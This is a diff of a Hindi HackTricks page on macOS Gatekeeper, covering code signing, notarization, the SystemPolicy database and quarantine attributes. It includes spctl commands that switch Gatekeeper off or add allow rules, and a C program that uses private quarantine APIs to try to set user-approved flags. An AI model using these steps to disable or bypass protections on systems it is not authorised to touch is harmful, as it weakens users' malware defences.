 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

-* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
-* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।**
-* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)
+* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) या **Twitter पर** मुझे **follow** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **अपनी hacking tricks साझा करें PRs जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)
 *
 * .

@ -16,21 +16,29 @@

 ## Gatekeeper

-**Gatekeeper** एक सुरक्षा सुविधा है जो मैक ऑपरेटिंग सिस्टम के लिए विकसित की गई है, जिसका उद्देश्य है सुनिश्चित करना कि उपयोगकर्ता उनके सिस्टम पर केवल **विश्वसनीय सॉफ़्टवेयर चलाएं**। यह कार्य करता है **सॉफ़्टवेयर की प्रमाणित** करके जो उपयोगकर्ता डाउनलोड करता है और खोलने की कोशिश करता है **ऐप स्टोर के बाहर स्रोतों** से, जैसे एक ऐप, एक प्लगइन या एक स्थापना पैकेज।
+**Gatekeeper** एक सुरक्षा सुविधा है जो Mac ऑपरेटिंग सिस्टम्स के लिए विकसित की गई है, जिसका उद्देश्य यह सुनिश्चित करना है कि उपयोगकर्ता अपने सिस्टम पर केवल **विश्वसनीय सॉफ्टवेयर चलाएं**। यह **सॉफ्टवेयर का मान्यता प्राप्त करने** के द्वारा काम करता है जिसे उपयोगकर्ता डाउनलोड करता है और App Store के **बाहरी स्रोतों से** खोलने का प्रयास करता है, जैसे कि एक ऐप, प्लग-इन, या इंस्टॉलर पैकेज।

-Gatekeeper की मुख्य यांत्रिकी उसकी **सत्यापन** प्रक्रिया में होती है। यह जांचता है कि डाउनलोड की गई सॉफ़्टवेयर **पहचाने गए डेवलपर द्वारा साइन की गई है**, सुनिश्चित करते हुए कि सॉफ़्टवेयर की प्रामाणिकता है। इसके अलावा, यह यह सुनिश्चित करता है कि सॉफ़्टवेयर **Apple द्वारा नोटराइज़ नहीं की गई है**, जिससे पता चलता है कि इसमें ज्ञात खतरनाक सामग्री नहीं है और नोटराइज़ के बाद संशोधित नहीं किया गया है।
+Gatekeeper की मुख्य तंत्र इसकी **सत्यापन** प्रक्रिया में निहित है। यह जांचता है कि डाउनलोड किया गया सॉफ्टवेयर **मान्यता प्राप्त डेवलपर द्वारा हस्ताक्षरित है** या नहीं, जिससे सॉफ्टवेयर की प्रामाणिकता सुनिश्चित होती है। इसके अलावा, यह यह भी सुनिश्चित करता है कि सॉफ्टवेयर **Apple द्वारा नोटराइज्ड है**, जिससे पुष्टि होती है कि इसमें ज्ञात मैलवेयर सामग्री नहीं है और नोटराइजेशन के बाद इसमें कोई छेड़छाड़ नहीं की गई है।

-इसके अतिरिक्त, Gatekeeper उपयोगकर्ता नियंत्रण और सुरक्षा को मजबूत करता है द्वारा **उपयोगकर्ताओं को मंजूरी देने के लिए प्रोत्साहित करने** के द्वारा डाउनलोड की गई सॉफ़्टवेयर को पहली बार खोलने के लिए। यह सुरक्षा उपाय उपयोगकर्ताओं को अनजाने में हानिकारक एक्जीक्यूटेबल कोड को चलाने से रोकने में मदद करती है, जिसे वे एक अहानिकारक डेटा फ़ाइल के रूप में गलती से समझ सकते हैं।
+इसके अतिरिक्त, Gatekeeper उपयोगकर्ता नियंत्रण और सुरक्षा को मजबूत करता है **उपयोगकर्ताओं को पहली बार डाउनलोड किए गए सॉफ्टवेयर को खोलने की अनुमति देने के लिए प्रेरित करके**। यह सुरक्षा उपाय उपयोगकर्ताओं को अनजाने में संभावित रूप से हानिकारक निष्पादन योग्य कोड चलाने से रोकता है जिसे वे हानिरहित डेटा फ़ाइल के लिए गलती कर सकते हैं।

 ### एप्लिकेशन हस्ताक्षर

-एप्लिकेशन हस्ताक्षर, जिसे कोड हस्ताक्षर भी कहा जाता है, Apple की सुरक्षा बुनियाद का एक महत्वपूर्ण घटक है। इसका उपयोग सॉफ़्टवेयर लेखक (डेवलपर) की पहचान **सत्यापित करने** और सुनिश्चित करने के लिए किया जाता है कि कोड को अंतिम बार हस्ताक्षर किए जाने के बाद संशोधित नहीं किया गया है।
+एप्लिकेशन हस्ताक्षर, जिन्हें कोड हस्ताक्षर भी कहा जाता है, Apple की सुरक्षा अवसंरचना का एक महत्वपूर्ण घटक हैं। इनका उपयोग **सॉफ्टवेयर लेखक की पहचान की पुष्टि करने** (डेवलपर) और यह सुनिश्चित करने के लिए किया जाता है कि कोड को अंतिम बार हस्ताक्षरित करने के बाद से छेड़छाड़ नहीं की गई है।

-यहां इसका काम कैसे करता है:
+यहाँ यह कैसे काम करता है:

-1. **एप्लिकेशन को हस्ताक्षर करना:** जब एक डेवलपर अपना एप्लिकेशन वितरित करने के लिए तैयार होता है, वह एक निजी कुंजी का उपयोग करके एप्लिकेशन को **हस्ताक्षर करता है**। यह निजी कुंजी उस प्रमाण पत्र से संबंधित होती है जिसे Apple डेवलपर प्रोग्राम में डेवलपर को जारी करता है। हस्ताक्षर प्रक्रिया में, एप्लिकेशन के सभी हिस्सों का एक क्रिप्टोग्राफिक हैश बनाया जाता है और इस हैश को डेवलपर की निजी कुंजी के साथ एन्क्रिप्ट किया जाता है।
-2. **एप्लिकेशन का वितरण:** हस्ताक्षरित एप्लिकेशन तब उपयोगकर्ताओं के साथ वितरित किया जाता है जो डेवलपर के प्रमाण पत्र के साथ आता है, जिसमें संबंधित सार्वजनिक कुंजी होती है।
-3. **एप्लिकेशन की सत्यापना:** जब एक उपयोगकर
+1. **एप्लिकेशन को हस्ताक्षरित करना:** जब एक डेवलपर अपने एप्लिकेशन को वितरित करने के लिए तैयार होता है, वे **एक निजी कुंजी का उपयोग करके एप्लिकेशन को हस्ताक्षरित करते हैं**। यह निजी कुंजी एक **प्रमाणपत्र से जुड़ी होती है जो Apple डेवलपर को जारी करता है** जब वे Apple Developer Program में नामांकन करते हैं। हस्ताक्षर प्रक्रिया में ऐप के सभी भागों का क्रिप्टोग्राफिक हैश बनाना और इस हैश को डेवलपर की निजी कुंजी से एन्क्रिप्ट करना शामिल है।
+2. **एप्लिकेशन का वितरण:** हस्ताक्षरित एप्लिकेशन को फिर डेवलपर के प्रमाणपत्र के साथ उपयोगकर्ताओं को वितरित किया जाता है, जिसमें संबंधित सार्वजनिक कुंजी होती है।
+3. **एप्लिकेशन की पुष्टि करना:** जब एक उपयोगकर्ता एप्लिकेशन डाउनलोड करता है और इसे चलाने का प्रयास करता है, उनका Mac ऑपरेटिंग सिस्टम डेवलपर के प्रमाणपत्र से सार्वजनिक कुंजी का उपयोग करके हैश को डिक्रिप्ट करता है। फिर यह एप्लिकेशन की वर्तमान स्थिति के आधार पर हैश की पुनः गणना करता है और इसे डिक्रिप्ट किए गए हैश के साथ तुलना करता है। अगर वे मेल खाते हैं, इसका मतलब है **एप्लिकेशन में कोई बदलाव नहीं किया गया है** डेवलपर द्वारा हस्ताक्षरित होने के बाद, और सिस्टम एप्लिकेशन को चलाने की अनुमति देता है।
+
+एप्लिकेशन हस्ताक्षर Apple के Gatekeeper तकनीक का एक अनिवार्य हिस्सा हैं। जब एक उपयोगकर्ता इंटरनेट से डाउनलोड किए गए एप्लिकेशन को खोलने का प्रयास करता है, Gatekeeper एप्लिकेशन हस्ताक्षर की पुष्टि करता है। अगर यह Apple द्वारा जारी किए गए प्रमाणपत्र के साथ हस्ताक्षरित है और कोड में कोई छेड़छाड़ नहीं की गई है, तो Gatekeeper एप्लिकेशन को चलाने की अनुमति देता है। अन्यथा, यह एप्लिकेशन को ब्लॉक करता है और उपयोगकर्ता को सतर्क करता है।
+
+macOS Catalina से शुरू करके, **Gatekeeper यह भी जांचता है कि एप्लिकेशन को Apple द्वारा नोटराइज्ड किया गया है** या नहीं, जिससे सुरक्षा की एक अतिरिक्त परत जोड़ी जाती है। नोटराइजेशन प्रक्रिया एप्लिकेशन को ज्ञात सुरक्षा मुद्दों और मैलवेयर कोड के लिए जांचती है, और अगर ये जांच पास हो जाती हैं, तो Apple एप्लिकेशन में एक टिकट जोड़ता है जिसे Gatekeeper सत्यापित कर सकता है।
+
+#### हस्ताक्षरों की जांच करें
+
+जब आप किसी **malware sample** की जांच कर रहे हों, तो आपको हमेशा **हस्ताक्षर की जांच करनी चाहिए** क्योंकि **डेवलपर** जिसने इसे हस्ताक्षरित किया हो, वह पहले से ही **malware से संबंधित** हो सकता है।
 ```bash
 # Get signer
 codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -47,32 +55,32 @@ spctl --assess --verbose /Applications/Safari.app
 # Sign a binary
 codesign -s <cert-name-keychain> toolsdemo
 ```
-### नोटराइज़ेशन
+### नोटरीकरण

-एप्पल की नोटराइज़ेशन प्रक्रिया उपयोगकर्ताओं को संभावित नुकसानदायक सॉफ़्टवेयर से सुरक्षित रखने के लिए एक अतिरिक्त सुरक्षा प्रणाली के रूप में काम करती है। इसमें, **डेवलपर अपने एप्लिकेशन को एप्पल की नोटरी सेवा के द्वारा जांच के लिए सबमिट करता है**, जिसे एप रिव्यू से गलती से न मिला जाए। यह सेवा एक **स्वचालित प्रणाली** है जो सबमिट किए गए सॉफ़्टवेयर को **खतरनाक सामग्री** और कोड-साइनिंग के संबंध में किसी भी संभावित समस्या की जांच करती है।
+Apple की नोटरीकरण प्रक्रिया उपयोगकर्ताओं को संभावित रूप से हानिकारक सॉफ्टवेयर से बचाने के लिए एक अतिरिक्त सुरक्षा उपाय के रूप में काम करती है। इसमें **डेवलपर द्वारा उनके एप्लिकेशन की जांच के लिए जमा करना** शामिल है **Apple की नोटरी सेवा** द्वारा, जिसे App Review से भ्रमित नहीं होना चाहिए। यह सेवा एक **स्वचालित प्रणाली** है जो जमा किए गए सॉफ्टवेयर की **मैलिशस कंटेंट** की उपस्थिति और कोड-साइनिंग के साथ किसी भी संभावित समस्याओं की जांच करती है।

-यदि सॉफ़्टवेयर इस जांच को **सफलतापूर्वक पारित** करता है और कोई चिंता नहीं उठाता है, तो नोटरी सेवा एक नोटराइज़ेशन टिकट उत्पन्न करती है। डेवलपर को फिर से अपने सॉफ़्टवेयर के साथ इस टिकट को **जोड़ना आवश्यक होता है**, जिसे 'स्टैपलिंग' कहा जाता है। इसके अलावा, नोटराइज़ेशन टिकट भी ऑनलाइन प्रकाशित किया जाता है जहां गेटकीपर, एप्पल की सुरक्षा प्रौद्योगिकी, इसे एक्सेस कर सकता है।
+यदि सॉफ्टवेयर इस निरीक्षण को बिना किसी चिंता के **पास** करता है, तो नोटरी सेवा एक नोटरीकरण टिकट उत्पन्न करती है। फिर डेवलपर को इस टिकट को उनके सॉफ्टवेयर से **जोड़ना** आवश्यक होता है, जिसे 'स्टेपलिंग' कहा जाता है। इसके अलावा, नोटरीकरण टिकट को ऑनलाइन भी प्रकाशित किया जाता है जहां Gatekeeper, Apple की सुरक्षा प्रौद्योगिकी, इसे एक्सेस कर सकती है।

-उपयोगकर्ता के पहले सॉफ़्टवेयर के स्थापना या निष्पादन पर, नोटराइज़ेशन टिकट की मौजूदगी - चाहे एक्जीक्यूटेबल के साथ स्टैपल की गई हो या ऑनलाइन मिली हो - गेटकीपर को सूचित करती है कि सॉफ़्टवेयर को एप्पल द्वारा नोटराइज़ किया गया है। इस परिणामस्वरूप, गेटकीपर प्रारंभिक लॉन्च डायलॉग में एक वर्णनात्मक संदेश प्रदर्शित करता है, जिसमें बताया जाता है कि सॉफ़्टवेयर को एप्पल द्वारा खतरनाक सामग्री की जांच की गई है। इस प्रक्रिया से उपयोगकर्ता अपने सिस्टम पर स्थापित या चलाए जाने वाले सॉफ़्टवेयर की सुरक्षा में अधिक विश्वास रखते हैं।
+उपयोगकर्ता द्वारा पहली बार सॉफ्टवेयर की स्थापना या निष्पादन के समय, नोटरीकरण टिकट की उपस्थिति - चाहे वह एक्जीक्यूटेबल से स्टेपल की गई हो या ऑनलाइन पाई गई हो - **Gatekeeper को सूचित करती है कि सॉफ्टवेयर को Apple द्वारा नोटरीकरण किया गया है**। परिणामस्वरूप, Gatekeeper प्रारंभिक लॉन्च डायलॉग में एक वर्णनात्मक संदेश प्रदर्शित करता है, जो दर्शाता है कि सॉफ्टवेयर Apple द्वारा मैलिशस कंटेंट के लिए जांचा गया है। इस प्रक्रिया से उपयोगकर्ताओं का उनके सिस्टम पर स्थापित या चलाए जाने वाले सॉफ्टवेयर की सुरक्षा में विश्वास बढ़ता है।

-### गेटकीपर की गणना करना
+### GateKeeper की गणना करना

-गेटकीपर एक सुरक्षा घटक है जो अविश्वसनीय ऐप्स को निष्पादित होने से रोकता है और इसके साथ ही यह कई सुरक्षा घटकों को भी है।
+GateKeeper दोनों है, **कई सुरक्षा घटक** जो अविश्वसनीय एप्स को निष्पादित होने से रोकते हैं और यह भी **घटकों में से एक है**।

-गेटकीपर की **स्थिति** को देखने के लिए निम्न का उपयोग किया जा सकता है:
+GateKeeper की **स्थिति** देखना संभव है:
 ```bash
 # Check the status
 spctl --status
 ```
 {% hint style="danger" %}
-ध्यान दें कि GateKeeper हस्ताक्षर जांच केवल **क्वारंटीन विशेषता वाले फ़ाइलों** के लिए होती है, हर फ़ाइल के लिए नहीं।
+ध्यान दें कि GateKeeper हस्ताक्षर जांच केवल **Quarantine विशेषता वाली फाइलों** पर की जाती है, हर फाइल पर नहीं।
 {% endhint %}

-GateKeeper यह जांचेगा कि क्या एक बाइनरी को **प्राथमिकताएं और हस्ताक्षर** के अनुसार चलाया जा सकता है:
+GateKeeper यह जांचेगा कि **प्राथमिकताओं और हस्ताक्षर** के अनुसार एक बाइनरी को निष्पादित किया जा सकता है:

 <figure><img src="../../../.gitbook/assets/image (678).png" alt=""><figcaption></figcaption></figure>

-इस समाकृति को रखने वाला डेटाबेस **`/var/db/SystemPolicy`** में स्थित है। आप इस डेटाबेस की जांच रूट के रूप में कर सकते हैं:
+इस कॉन्फ़िगरेशन को रखने वाला डेटाबेस **`/var/db/SystemPolicy`** में स्थित है। आप इस डेटाबेस को रूट के साथ जांच सकते हैं:
 ```bash
 # Open database
 sqlite3 /var/db/SystemPolicy
@ -86,10 +94,10 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
 anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
 [...]
 ```
-नोट करें कि पहला नियम "**ऐप स्टोर**" में समाप्त हुआ था और दूसरा नियम "**डेवलपर आईडी**" में समाप्त हुआ था और पिछले इमेज में यह **ऐप स्टोर और पहचाने गए डेवलपरों से ऐप्स को चलाने के लिए सक्षम किया गया था**।
-यदि आप उस सेटिंग को ऐप स्टोर पर संशोधित करते हैं, तो "**नोटराइज्ड डेवलपर आईडी" नियम गायब हो जाएंगे**।
+ध्यान दें कि पहला नियम "**App Store**" पर समाप्त हुआ और दूसरा "**Developer ID**" पर और पिछली छवि में यह **App Store और पहचाने गए डेवलपर्स से ऐप्स को निष्पादित करने के लिए सक्षम था**।
+यदि आप उस सेटिंग को App Store में **संशोधित** करते हैं, तो "**Notarized Developer ID" नियम गायब हो जाएंगे**।

-यहां **GKE** प्रकार के हजारों नियम भी हैं:
+**type GKE** के भी हजारों नियम हैं:
 ```bash
 SELECT requirement,allow,disabled,label from authority where label = 'GKE' limit 5;
 cdhash H"b40281d347dc574ae0850682f0fd1173aa2d0a39"|1|0|GKE
@ -98,9 +106,13 @@ cdhash H"4317047eefac8125ce4d44cab0eb7b1dff29d19a"|1|0|GKE
 cdhash H"0a71962e7a32f0c2b41ddb1fb8403f3420e1d861"|1|0|GKE
 cdhash H"8d0d90ff23c3071211646c4c9c607cdb601cb18f"|1|0|GKE
 ```
-ये हैश **`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth`, `/var/db/gke.bundle/Contents/Resources/gk.db`** और **`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`** से आते हैं।
+ये हैशेज **`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth`, `/var/db/gke.bundle/Contents/Resources/gk.db`** और **`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`** से आते हैं।

-**`spctl`** के विकल्प **`--master-disable`** और **`--global-disable`** इन हस्ताक्षर जांचों को पूरी तरह से **अक्षम** कर देंगे:
+या आप पिछली जानकारी को इस प्रकार सूचीबद्ध कर सकते हैं:
+```bash
+sudo spctl --list
+```
+विकल्प **`--master-disable`** और **`--global-disable`** का उपयोग **`spctl`** में इन हस्ताक्षर जांचों को पूरी तरह से **अक्षम** कर देगा:
 ```bash
 # Disable GateKeeper
 spctl --global-disable
@ -110,15 +122,15 @@ spctl --master-disable
 spctl --global-enable
 spctl --master-enable
 ```
-पूरी तरह से सक्षम करने पर, एक नया विकल्प दिखाई देगा:
+पूरी तरह से सक्षम होने पर, एक नया विकल्प दिखाई देगा:

 <figure><img src="../../../.gitbook/assets/image (679).png" alt=""><figcaption></figcaption></figure>

-यह **जांचना संभव है कि क्या गेटकीपर द्वारा एक ऐप को अनुमति दी जाएगी** के साथ:
+**यह जांचना संभव है कि कोई ऐप GateKeeper द्वारा अनुमति दी जाएगी या नहीं** :
 ```bash
 spctl --assess -v /Applications/App.app
 ```
-गेटकीपर में नए नियम जोड़ना संभव है ताकि कुछ ऐप्स को निष्पादित किया जा सके:
+GateKeeper में नए नियम जोड़कर कुछ ऐप्स के निष्पादन की अनुमति दी जा सकती है:
 ```bash
 # Check if allowed - nop
 spctl --assess -v /Applications/App.app
@ -133,27 +145,27 @@ sudo spctl --enable --label "whitelist"
 spctl --assess -v /Applications/App.app
 /Applications/App.app: accepted
 ```
-### क्वारंटाइन फ़ाइलें
+### क्वारंटाइन फाइल्स

-एक एप्लिकेशन या फ़ाइल को डाउनलोड करने के बाद, macOS के विशेष एप्लिकेशन जैसे वेब ब्राउज़र या ईमेल क्लाइंट डाउनलोड की गई फ़ाइल के लिए एक विस्तारित फ़ाइल गुणांक जो कि "क्वारंटाइन झंडा" के रूप में जाना जाता है, जोड़ते हैं। यह गुणांक फ़ाइल को एक असुरक्षित स्रोत (इंटरनेट) से आने वाला और संभावित जोखिम ले जाने वाला चिह्नित करने के रूप में सुरक्षा उपाय के रूप में कार्य करता है। हालांकि, सभी एप्लिकेशन इस गुणांक को जोड़ते नहीं हैं, उदाहरण के लिए, सामान्य बिटटोरेंट क्लाइंट सॉफ़्टवेयर आमतौर पर इस प्रक्रिया को छोड़ देता है।
+**डाउनलोडिंग** के दौरान किसी एप्लिकेशन या फाइल को, macOS के विशिष्ट **एप्लिकेशन्स** जैसे वेब ब्राउजर्स या ईमेल क्लाइंट्स, डाउनलोड की गई फाइल पर एक विस्तारित फाइल एट्रिब्यूट **जोड़ते हैं**, जिसे आमतौर पर "**क्वारंटाइन फ्लैग**" के नाम से जाना जाता है। यह एट्रिब्यूट एक सुरक्षा उपाय के रूप में काम करता है जो फाइल को एक अविश्वसनीय स्रोत (इंटरनेट) से आने वाली और संभावित जोखिम वाली के रूप में **चिह्नित करता है**। हालांकि, सभी एप्लिकेशन्स यह एट्रिब्यूट नहीं जोड़ते हैं, उदाहरण के लिए, आम BitTorrent क्लाइंट सॉफ्टवेयर आमतौर पर इस प्रक्रिया को बायपास करते हैं।

-**क्वारंटाइन झंडा मौजूद होने पर, जब उपयोगकर्ता फ़ाइल को निष्पादित करने का प्रयास करता है, macOS के गेटकीपर सुरक्षा सुविधा को संकेत मिलता है।**
+**क्वारंटाइन फ्लैग की उपस्थिति macOS के Gatekeeper सुरक्षा फीचर को संकेत देती है जब उपयोगकर्ता फाइल को निष्पादित करने का प्रयास करता है**।

-जब **क्वारंटाइन झंडा मौजूद नहीं होता है** (बिटटोरेंट क्लाइंट के माध्यम से डाउनलोड की गई फ़ाइलों के साथ), गेटकीपर की **जांचें नहीं की जा सकती हैं**। इसलिए, उपयोगकर्ताओं को असुरक्षित या अज्ञात स्रोतों से डाउनलोड की गई फ़ाइलें खोलने पर सतर्क रहना चाहिए।
+जिस स्थिति में **क्वारंटाइन फ्लैग मौजूद नहीं होता है** (जैसे कि कुछ BitTorrent क्लाइंट्स के माध्यम से डाउनलोड की गई फाइलों के साथ), Gatekeeper के **चेक्स प्रदर्शित नहीं किए जा सकते हैं**। इसलिए, उपयोगकर्ताओं को कम सुरक्षित या अज्ञात स्रोतों से डाउनलोड की गई फाइलों को खोलते समय सावधानी बरतनी चाहिए।

 {% hint style="info" %}
-कोड हस्ताक्षरों की मान्यता की **जांच** एक **संसाधन-प्रवर्धनात्मक** प्रक्रिया है जिसमें कोड और उसके सभी बंडल रिसोर्सेज़ के क्रिप्टोग्राफ़िक हैश उत्पन्न करने शामिल होते हैं। इसके अलावा, प्रमाणपत्र की मान्यता की जांच में शामिल होता है कि इसे जारी किए जाने के बाद रद्द किया गया है या नहीं, जिसके लिए ऑनलाइन जांच की जाती है। इन कारणों से, पूर्ण कोड हस्ताक्षर और नोटराइज़ेशन जांच को **हर बार जब एक ऐप लॉन्च होता है, चलाना असंभव हो जाता है**।
+कोड हस्ताक्षरों की **वैधता की जांच** एक **संसाधन-गहन** प्रक्रिया है जिसमें कोड और उसके सभी बंडल किए गए संसाधनों के क्रिप्टोग्राफिक **हैशेज** उत्पन्न करना शामिल है। इसके अलावा, प्रमाणपत्र की वैधता की जांच में Apple के सर्वरों पर एक **ऑनलाइन जांच** करना शामिल है ताकि यह देखा जा सके कि क्या इसे जारी किए जाने के बाद रद्द कर दिया गया है। इन कारणों से, पूर्ण कोड हस्ताक्षर और नोटराइजेशन जांच को हर बार एप्लिकेशन लॉन्च होने पर चलाना **अव्यावहारिक है**।

-इसलिए, ये जांचें **केवल क्वारंटाइन गुणांक वाले ऐप्स को निष्पादित करते समय ही चलाई जाती हैं**।
+इसलिए, ये जांचें **केवल उन एप्लिकेशन्स को निष्पादित करते समय चलाई जाती हैं जिनमें क्वारंटाइन एट्रिब्यूट होता है।**
 {% endhint %}

 {% hint style="warning" %}
-यह गुणांक फ़ाइल को बनाने / डाउनलोड करने वाले एप्लिकेशन द्वारा **सेट किया जाना चाहिए**।
+यह एट्रिब्यूट **फाइल बनाने/डाउनलोड करने वाले एप्लिकेशन द्वारा सेट किया जाना चाहिए**।

-हालांकि, सैंडबॉक्स किए गए फ़ाइलों के लिए इस गुणांक को सेट किया जाएगा। और सैंडबॉक्स नहीं किए गए ऐप्स इसे खुद ही सेट कर सकते हैं, या **Info.plist** में [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) कुंजी निर्दिष्ट कर सकते हैं जिससे सिस्टम निर्मित फ़ाइलों पर `com.apple.quarantine` विस्तारित गुणांक सेट करता है,
+हालांकि, सैंडबॉक्स की गई फाइलों में यह एट्रिब्यूट हर फाइल को बनाने पर सेट किया जाएगा। और नॉन सैंडबॉक्स एप्लिकेशन्स इसे स्वयं सेट कर सकते हैं, या **Info.plist** में [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) कुंजी को निर्दिष्ट कर सकते हैं जिससे सिस्टम बनाई गई फाइलों पर `com.apple.quarantine` विस्तारित एट्रिब्यूट सेट करेगा,
 {% endhint %}

-इसकी स्थिति की **जांच और सक्षम / अक्षम** (रूट की आवश्यकता होती है) करना संभव है:
+इसकी स्थिति की **जांच करने और सक्षम/अक्षम** करने के लिए संभव है (रूट आवश्यक) के साथ:
 ```bash
 spctl --status
 assessments enabled
@ -162,13 +174,13 @@ spctl --enable
 spctl --disable
 #You can also allow nee identifies to execute code using the binary "spctl"
 ```
-आप निम्नलिखित के साथ भी **जांच सकते हैं कि क्या एक फ़ाइल में quarantine विस्तारित गुणधर्म है**:
+आप यह भी **पता लगा सकते हैं कि किसी फ़ाइल में quarantine विस्तारित विशेषता है या नहीं** इसके साथ:
 ```bash
 xattr file.png
 com.apple.macl
 com.apple.quarantine
 ```
-विस्तारित गुणों की मान की जांच करें और इसके साथ उस ऐप का पता लगाएं जिसने क्वारंटीन गुण लिखा है:
+**मान** की जांच करें **विस्तारित** **गुणों** की और पता लगाएं कि किस ऐप ने quarantine attr लिखा है:
 ```bash
 xattr -l portada.png
 com.apple.macl:
@ -179,18 +191,84 @@ com.apple.macl:
 00000040  00 00 00 00 00 00 00 00                          |........|
 00000048
 com.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5
-# 00c1 -- It has been allowed to eexcute this file
+# 00c1 -- It has been allowed to eexcute this file (QTN_FLAG_USER_APPROVED = 0x0040)
 # 607842eb -- Timestamp
 # Brave -- App
 # F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded
 ```
-और उस गुण को इस प्रकार से **हटाएं**:
+वास्तव में एक प्रक्रिया "उसके द्वारा बनाई गई फाइलों पर क्वारंटाइन फ्लैग्स सेट कर सकती है" (मैंने बनाई गई फाइल में USER\_APPROVED फ्लैग लागू करने की कोशिश की लेकिन यह इसे लागू नहीं करेगा):
+
+<details>
+
+<summary>सोर्स कोड लागू क्वारंटाइन फ्लैग्स</summary>
+```c
+#include <stdio.h>
+#include <stdlib.h>
+
+enum qtn_flags {
+QTN_FLAG_DOWNLOAD = 0x0001,
+QTN_FLAG_SANDBOX = 0x0002,
+QTN_FLAG_HARD = 0x0004,
+QTN_FLAG_USER_APPROVED = 0x0040,
+};
+
+#define qtn_proc_alloc _qtn_proc_alloc
+#define qtn_proc_apply_to_self _qtn_proc_apply_to_self
+#define qtn_proc_free _qtn_proc_free
+#define qtn_proc_init _qtn_proc_init
+#define qtn_proc_init_with_self _qtn_proc_init_with_self
+#define qtn_proc_set_flags _qtn_proc_set_flags
+#define qtn_file_alloc _qtn_file_alloc
+#define qtn_file_init_with_path _qtn_file_init_with_path
+#define qtn_file_free _qtn_file_free
+#define qtn_file_apply_to_path _qtn_file_apply_to_path
+#define qtn_file_set_flags _qtn_file_set_flags
+#define qtn_file_get_flags _qtn_file_get_flags
+#define qtn_proc_set_identifier _qtn_proc_set_identifier
+
+typedef struct _qtn_proc *qtn_proc_t;
+typedef struct _qtn_file *qtn_file_t;
+
+int qtn_proc_apply_to_self(qtn_proc_t);
+void qtn_proc_init(qtn_proc_t);
+int qtn_proc_init_with_self(qtn_proc_t);
+int qtn_proc_set_flags(qtn_proc_t, uint32_t flags);
+qtn_proc_t qtn_proc_alloc();
+void qtn_proc_free(qtn_proc_t);
+qtn_file_t qtn_file_alloc(void);
+void qtn_file_free(qtn_file_t qf);
+int qtn_file_set_flags(qtn_file_t qf, uint32_t flags);
+uint32_t qtn_file_get_flags(qtn_file_t qf);
+int qtn_file_apply_to_path(qtn_file_t qf, const char *path);
+int qtn_file_init_with_path(qtn_file_t qf, const char *path);
+int qtn_proc_set_identifier(qtn_proc_t qp, const char* bundleid);
+
+int main() {
+
+qtn_proc_t qp = qtn_proc_alloc();
+qtn_proc_set_identifier(qp, "xyz.hacktricks.qa");
+qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED);
+qtn_proc_apply_to_self(qp);
+qtn_proc_free(qp);
+
+FILE *fp;
+fp = fopen("thisisquarantined.txt", "w+");
+fprintf(fp, "Hello Quarantine\n");
+fclose(fp);
+
+return 0;
+
+}
